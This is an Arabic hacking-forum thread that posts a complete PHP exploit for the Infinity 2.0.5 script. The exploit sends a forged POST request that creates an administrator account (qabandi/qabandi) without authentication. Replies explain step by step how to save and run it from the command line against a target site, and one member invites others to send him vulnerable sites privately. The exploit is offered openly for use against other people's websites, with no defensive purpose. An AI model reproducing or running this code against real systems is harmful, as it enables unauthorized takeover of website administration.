التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 05-17-2011, 06:29 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو






سهمـ الشمالـ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
سهمـ الشمالـ is on a distinguished road

افتراضي ثغرة ,,


كود:
       <?phpprint_r('
                                       ||          ||   | ||
                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
                               (  :  /    (_)    /           (      .
 
                                        ___________________
                                      _/QQQQQQQQQQQQQQQQQQQ\__
[q] Infinity <= 2.0.5 Create Admin __/QQQ/````````````````\QQQ\___
                                 _/QQQQQ/                  \QQQQQQ\
[q] _POST <3                    /QQQQ/``                    ```QQQQ\
                               /QQQQ/                          \QQQQ\
[q] Owned :)                  |QQQQ/    By  Qabandi             \QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
[/]   -[WHAT?]-                \QQQQ\                      __  /QQQQ/
                                \QQQQ\                    /QQ\_QQQQ/
                                 \QQQQ\                   \QQQQQQQ/
                                  \QQQQQ\                 /QQQQQ/_
                                   ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                      ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                         ```````````````````     `````
 ______________________________________________________________________________
/                                                                              \
|       :: Stupid vulnerability in a good script :( tsk tsk                    |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
                                    Sec-Code.com
                                     
 
USAGE: php whatever.php localhost /infinity/
 
 
');
 
ini_set("max_execution_time",0);
 
 function QABANDI($victim,$vic_dir){
$host = $victim;
$p = "http://".$host.$vic_dir;
 
 
 
 
          $data   ="name=qabandi&password=qabandi&conf_password=qabandi&email=Qabandi@was.here&nat=man&hoppy=QabandiWasHere&text=QabandiWasHere&country=1";
          $packet ="POST ".$p."/cp/profile.php?action=donewauthor HTTP/1.0\r\n";
          $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Content-Length: ".strlen($data)."\r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
 
 
 
         //print $packet;
    $o = @fsockopen($host, 80);
    if(!$o){
        echo "\n[x] No response...\n";
        die;
    }
     
    fputs($o, $packet);
    while (!feof($o)) $data .= fread($o, 1024);
    fclose($o);
     
    $_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
    if ( !empty($_404) ){
        echo "\n[x] 404 Not Found... Make sure of path. \n";
        die;
    }
     
        $_401 = strstr( $data, "401 Authorization Required" );
    if ( !empty($_401) ){
        echo "\n[x] HTTP authentication detected! (mrakib jdar narry, maku faydeh) \n";
        die;
    }
                                           
                                           echo "Admin created !\n\nUsername: qabandi\npassword: qabandi";
 
 }
 
$host1 = $argv[1];
$userdir1=$argv[2];
QABANDI($host1,$userdir1);
 
die;
 
 
?>
 
# milw0rm.com [2009-07-15]
اتمنى احد يضع لنا شرح عن كيفية استغلالها ت1


eyvm <<

   

رد مع اقتباس
قديم 05-17-2011, 10:47 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي


$p = "http://".$host.$vic_dir;

غير هذا باسم الموقع، وقم بنسخ محتوى التغرة وسجله بصيغة .php

   

رد مع اقتباس
قديم 05-18-2011, 10:58 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


انا للاسف ما بقدر اشرحها فيديو لاني ما عندي وقت ابحث عن موقع اطبق لك عليه

لكن طريقه تشغيل الثغره سهله ان شاء الله

اولا الثغره لسكربت اسمو Infinity 2.0.5
اعتقد السكربت هاد منتشر كويس لكن في اصدار اجدد منه هو الاكثر انتشارا ...

المهم
ناخد كود الثغره ونحفظها في امتداد php
بالجهاز الخاص بنا وليكن حفظها على سطح المكتب باسم exploit.php

بعد لازم يكون بجهازنا منصبين السيرفر الشخصي من اجل يكون لدينا مترجم بي اتشبي

وثم
ندخل شاشه الدوز start-->run--->cmd

ثم ندخل لمسار سطح المكتب
cd desktop

بعد نشغل الثغره بالامر التالي
php exploit.php vbspiders.com /infinity/

بتبدل اسم الموقع بالموقع الي مركب السكربت
وكلمه انفتنتي بمسار السكربت

(عارف اني مقصر بالشرح ويلزم توضيح اكثر لكن حاول طبق حبه حبه وان شاء الله رح تفهم )

++
هنا ليس قسم استفساارات الرجاء الانتباه بالمرات القادمه وشكرا

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 05-18-2011, 11:02 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


صحيح انسيت اقولك الثغره تضيف ادمن باسم وباس
qabandi
qabandi

+ لو معاك مواقع مركبه السكربت زتها بالخاص وان اسعفني الوقت خلال اسبوع يكون درسك فيديو صوت وصوره

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 05-18-2011, 10:15 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي


ههههههه باين علي مبتدئ هون يا فولكانو !! ليش بهدلتني هههههههههههههههههههههههههههههههههه

   

رد مع اقتباس
قديم 05-19-2011, 11:35 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
إحصائية العضو






اجرام المالكي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
اجرام المالكي is on a distinguished road

افتراضي


يعطيك الف عافيه يابعدي ع الثغرة ~ْ

التوقيع

http://dc15.arabsh.com/i/02970/z3b3ytpcog7f.jpg

اجرام المالكي EjRaM 711
EJRI@HOTMAIL.COM

 

   

رد مع اقتباس
قديم 05-19-2011, 11:47 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي


مبدع ياغالي

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:33 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0